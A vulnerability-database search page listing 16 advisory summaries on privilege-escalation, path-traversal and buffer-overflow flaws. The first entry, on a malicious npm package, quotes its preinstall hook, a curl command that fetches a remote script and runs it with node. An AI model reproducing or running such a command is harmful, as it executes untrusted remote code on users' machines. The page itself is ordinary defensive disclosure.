
16 matches found

OSV
added 2026/06/11 12:38 p.m. · 8 views

MAL-2026-5645 Malicious code in sn-internal-test (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 215bae963612bf6e45ac8a32644e51b297c72d021048aa58a58fb0a5d0cb396d package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install...

5.8 AI score
Exploits: 0 · References: 3

CVE
added 2026/05/28 7:48 p.m. · 32 views

CVE-2026-49095

Kibana Fleet policy management feature is affected by CVE-2026-49095 due to improper input validation (CWE-20). An authenticated user with Fleet management privileges can inject values into a configuration override mechanism, causing Elastic Agents to be issued API keys with elevated Elasticsearc...

6.5 CVSS · 5.8 AI score · 0.00262 EPSS
Exploits: 0 · References: 1 · Affected Software: 1

Cvelist
added 2026/05/12 1:31 p.m. · 26 views

CVE-2026-40638

Dell PowerScale InsightIQ, versions 5.0.0 through 6.2.0, contains an execution with unnecessary privileges vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to elevation of privileges...

6.7 CVSS · 0.00119 EPSS
Exploits: 0 · References: 1

ATTACKERKB
added 2026/04/27 6:10 p.m. · 4 views

CVE-2026-25908

Dell Alienware Command Center AWCC, versions prior to 6.13.8.0, contain an Execution with Unnecessary Privileges vulnerability in the AWCC. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of Privileges...

6.7 CVSS · 5.3 AI score · 0.00093 EPSS
Exploits: 0 · References: 2

Snyk
added 2026/04/23 2:17 p.m. · 6 views

Execution with Unnecessary Privileges

Overview Affected versions of this package are vulnerable to Execution with Unnecessary Privileges through the runscript.py and runscript.rb script execution paths in the script runner components. An attacker can read sensitive credentials by running a script that prints the process environment,...

9.6 CVSS · 5.9 AI score · 0.00341 EPSS
Exploits: 1 · References: 2

EUVD
added 2025/12/12 3:30 p.m. · 3 views

EUVD-2025-203080

Execution with Unnecessary Privileges vulnerability in Nebim Neyir Computer Industry and Services Inc. Nebim V3 ERP allows Expanding Control over the Operating System from the Database. This issue affects Nebim V3 ERP: from 2.0.59 before 3.0.1...

8.8 CVSS · 6.5 AI score · 0.0035 EPSS
Exploits: 0 · References: 2

Snyk
added 2025/10/30 12:31 p.m. · 2 views

Execution with Unnecessary Privileges

Overview Affected versions of this package are vulnerable to Execution with Unnecessary Privileges via the bulk create API with the overwrite action. An attacker can modify existing records by submitting crafted requests with only CREATE privileges. Remediation Upgrade apache-airflow-core to...

5.4 CVSS · 7.1 AI score · 0.00396 EPSS
Exploits: 0 · References: 2

Cvelist
added 2025/08/22 11:41 a.m. · 9 views

CVE-2025-9257 Uniong|WebITR - Arbitrary File Reading through Path Traversal

WebITR developed by Uniong has an Arbitrary File Reading vulnerability, allowing remote attackers with regular privileges to exploit Absolute Path Traversal to download arbitrary system files...

7.1 CVSS · 0.00502 EPSS
Exploits: 0 · References: 2

Positive Technologies
added 2025/08/14 12:0 a.m. · 5 views

PT-2025-33357 · Dell · Dell Data Lakehouse

Name of the Vulnerable Software and Affected Versions: Dell Data Lakehouse versions prior to 1.5.0.0 Description: Dell Data Lakehouse is susceptible to an Execution with Unnecessary Privileges issue. A local attacker with high privileges could potentially exploit this, resulting in a Denial of...

6.7 CVSS · 6.3 AI score · 0.0013 EPSS
Exploits: 0 · References: 5

CVE
added 2025/02/04 8:2 a.m. · 44 views

CVE-2024-10239

CVE-2024-10239 concerns a stack overflow in the firmware image verification of the Supermicro MBD-X12DPG-OA6. The issue arises from an unchecked fat->fsd.max_fld in the image verification path, allowing an administrator-controlled upload of a crafted image to potentially trigger the overflow. ...

7.2 CVSS · 7.1 AI score · 0.00489 EPSS
Exploits: 0 · References: 1

OSV
added 2023/09/27 3:19 p.m. · 3 views

CVE-2023-4003

One Identity Password Manager version 5.9.7.1 - An unauthenticated attacker with physical access to a workstation may upgrade privileges to SYSTEM through an unspecified method. CWE-250: Execution with Unnecessary Privileges...

6.8 CVSS · 5.8 AI score · 0.00473 EPSS
Exploits: 0 · References: 1

OSV
added 2023/09/15 9:15 a.m. · 5 views

CVE-2023-4662

Execution with Unnecessary Privileges vulnerability in Saphira Saphira Connect allows Remote Code Inclusion. This issue affects Saphira Connect: before 9...

9.8 CVSS · 5.8 AI score · 0.01187 EPSS
Exploits: 0 · References: 1

CNNVD
added 2023/08/08 12:0 a.m. · 6 views

Siemens SICAM TOOLBOX II Security Vulnerability

SICAM TOOLBOX II is an engineering solution for plants and systems of all sizes. It allows data collection, data modeling, configuration and parameterization. It is used for process information engineering of automation and central control room systems. Siemens SICAM TOOLBOX II has an Execute wit...

7.8 CVSS · 6.7 AI score · 0.0018 EPSS
Exploits: 0 · References: 3

CNNVD
added 2022/06/08 12:0 a.m. · 10 views

NVIDIA DGX Buffer Error Vulnerability

NVIDIA DGX is a high-performance workstation for deep learning applications from NVIDIA. The NVIDIA DGX A100 suffers from a buffer error vulnerability that originates from a boundary error in the SBIOS in SmbiosPei. An attacker could exploit this vulnerability to trigger out-of-bounds writes and...

6.7 CVSS · 7.4 AI score · 0.00243 EPSS
Exploits: 0 · References: 4

CNNVD
added 2021/08/17 12:0 a.m. · 6 views

xArrow SCADA Input Validation Error Vulnerability

xArrow SCADA is an installer for industrial control products from xArrow in China. An input validation error vulnerability exists in xArrow SCADA version 7.2 and prior versions, which arises from allowing unauthenticated registry entries to run with application-level privileges...

7.8 CVSS · 7.4 AI score · 0.0025 EPSS
Exploits: 0 · References: 4

Check Point Advisories
added 2013/05/16 12:0 a.m. · 6 views

Sun Java Web Start Splashscreen GIF Decoding Buffer Overflow - Improved Performance (CVE-2008-2086)

The Sun Java Web Start is a component of the Java 2 Runtime Environment JRE. It allows for the network deployment of Java applications. This component enables stand-alone Java applications to be downloaded from a remote network location and invoked on a target machine. There exists a memory...

9.3 CVSS · 8 AI score · 0.07319 EPSS
Exploits: 1